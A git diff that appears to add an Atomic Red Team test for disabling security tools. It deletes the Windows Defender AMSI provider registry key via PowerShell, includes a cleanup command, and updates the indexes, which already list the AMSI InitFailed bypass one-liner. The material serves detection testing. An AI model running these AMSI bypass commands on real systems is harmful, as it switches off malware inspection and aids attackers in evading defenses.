diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 08c63e8f..1349e8a1 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -26,6 +26,8 @@
 
 - [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
 
+- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
+
 
 <br/>
 
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 ```
 
 <br/>
+<br/>
+
+## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
+With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
+This test removes the Windows Defender provider registry key. 
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
+```
+
+
+#### Cleanup Commands:
+```
+New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
+```
+
+<br/>
diff --git a/atomics/index.md b/atomics/index.md
index cda438b7..6360f737 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -194,6 +194,7 @@
   - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #10: Uninstall Sysmon [windows]
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 154d1117..5188e4a1 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6010,6 +6010,21 @@ defense-evasion:
         elevation_required: false
         command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
         cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
+    - name: AMSI Bypass - Remove AMSI Provider Reg Key
+      description: "With administrative rights, an adversary can remove the AMSI Provider
+        registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
+        test removes the Windows Defender provider registry key. \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
+          -Recurse
+
+'
+        cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
+          -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
   T1107:
     technique:
       external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index f634da4b..ab263544 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -38,6 +38,7 @@
   - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #10: Uninstall Sysmon [windows]
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)